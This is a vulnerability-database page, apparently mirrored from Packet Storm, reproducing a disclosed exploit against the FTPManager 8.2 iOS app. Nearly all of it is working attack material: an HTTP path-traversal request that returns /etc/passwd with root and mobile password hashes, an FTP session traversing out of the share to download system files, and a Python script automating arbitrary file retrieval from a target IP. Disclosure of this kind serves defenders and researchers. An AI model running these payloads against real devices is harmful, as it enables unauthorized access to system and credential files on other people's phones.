Vulners
Lucene search
FTPManager 8.2 Local File Inclusion / Directory Traversal
🗓️ 07 Sep 2022 00:00:00Reported by Chokri HammediType 
packetstorm🔗 packetstormsecurity.com👁 242 Views
`# Exploit Title: FTPManager 8.2 Local File inclusion
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: Ios 15.6
GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.1.178:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------------------
HTTP/1.1 200 OK
Connection: Close
Server: GCDWebUploader
Content-Type: application/octet-stream
Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT
Date: Tue, 06 Sep 2022 03:05:05 GMT
Content-Length: 2581
Cache-Control: max-age=3600, public
Etag: 1152921500312311384/1657708546/0
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource
Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device
Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO
Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false
_accessoryupdater:*:278:278:Accessory Update
Daemon:/var/db/accessoryupdater:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph
Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false
_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false
_trustd:*:282:282:trustd:/var/empty:/usr/bin/false
_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false
_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false
_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false
---------------------------------------------------
# Exploit Title: FTPManager 8.2 Directory Traversal (ftp)
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: ios 15.6
#ftp 192.168.1.178 2121
Connected to 192.168.1.178.
220 ---------- Welcome to FTPManager ----------
Name (192.168.1.178:chokri):
230 User chokri logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /../../../../../../../../../../../../../../../../
250 OK. Current directory is
/../../../../../../../../../../../../../../../../
ftp> ls
200 PORT command successful.
150 Accepted data connection
total 10
drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr
drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin
drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin
drwxr-xr-x 0 root wheel 160 Jan 01 1970 System
drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library
drwxr-xr-x 0 root wheel 224 Jan 01 1970 private
drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev
drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications
drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer
drwxr-xr-x 0 root admin 64 Jan 01 1970 cores
WARNING! 10 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
ftp> cd private/etc
250 OK. Current directory is
/../../../../../../../../../../../../../../../../private/etc
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful.
150 Opening BINARY mode data connection for 'passwd'.
226 Transfer complete.
2581 bytes received in 0.00 secs (11.5020 MB/s)
ftp> get services
local: services remote: services
200 PORT command successful.
150 Opening BINARY mode data connection for 'services'.
226 Transfer complete.
677977 bytes received in 0.17 secs (3.8257 MB/s)
---------------------------------------------------
# Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python
# Date: Sep 6, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186
# Version: 8.2
# Tested on: ios 15.6
from ftplib import FTP
import argparse
help = " FTPManager 8.2 Local File inclusion by chokri hammedi"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--file", help="File To Open eg: etc/passwd")
args = parser.parse_args()
ip = args.target
port = 2121 # Default Port
files = args.file
ftpConnection = FTP()
ftpConnection.connect(host=ip, port=port)
ftpConnection.login();
def downloadFile():
ftpConnection.cwd('/../../../../../../../../../../../../../../../../')
ftpConnection.retrbinary(f"RETR {files}", open('data.txt',
'wb').write)
ftpConnection.close()
file = open('data.txt', 'r')
print (f"[***] The contents of {files}\n")
print (file.read())
downloadFile()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Sep 2022 00:00Current
7.4High risk
Vulners AI Score7.4